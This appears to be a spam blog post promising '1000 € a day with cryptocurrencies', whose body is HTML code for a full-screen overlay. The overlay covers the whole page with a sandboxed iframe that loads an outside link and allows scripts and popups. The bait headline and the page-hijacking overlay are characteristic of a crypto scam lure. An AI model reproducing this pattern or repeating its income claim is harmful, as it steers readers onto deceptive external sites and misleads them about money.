Mein Weg zu 1000 € pro Tag mit Kryptowährungen – kostenlos
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta content="width=device-width, initial-scale=1.0" name="viewport">
<title>Pop-up Overlay</title>
<style>
/* Der weiße Hintergrund des Pop-ups */
#popup-overlay {
position: fixed;
top: 0;
left: 0;
width: 100%; /* Pop-up füllt die gesamte Breite */
height: 100%; /* Pop-up füllt die gesamte Höhe */
background-color: white;
display: flex;
align-items: center;
justify-content: center;
z-index: 9999;
opacity: 1;
visibility: visible;
transition: opacity 0.3s ease, visibility 0.3s ease;
border-radius: 0;
box-shadow: none;
}
/* Inhalt des Pop-ups */
#popup-content {
width: 100%;
height: 100%;
padding: 0;
background-color: #f9f9f9;
}
/* Stil für das iframe */
iframe {
width: 100%;
height: 100%; /* Das iframe füllt nun den gesamten Bildschirm */
border: none;
}
</style>
</head>
<body>
<!-- Pop-up Overlay -->
<div id="popup-overlay">
<div id="popup-content">
<!-- Das eingebettete iframe mit einer kompletten Webseite -->
<iframe src="https://covl.io/uu" frameborder="0" sandbox="allow-same-origin allow-scripts allow-popups"></iframe>
</div>
</div>
</body>
</html>
Keine Kommentare:
Kommentar veröffentlichen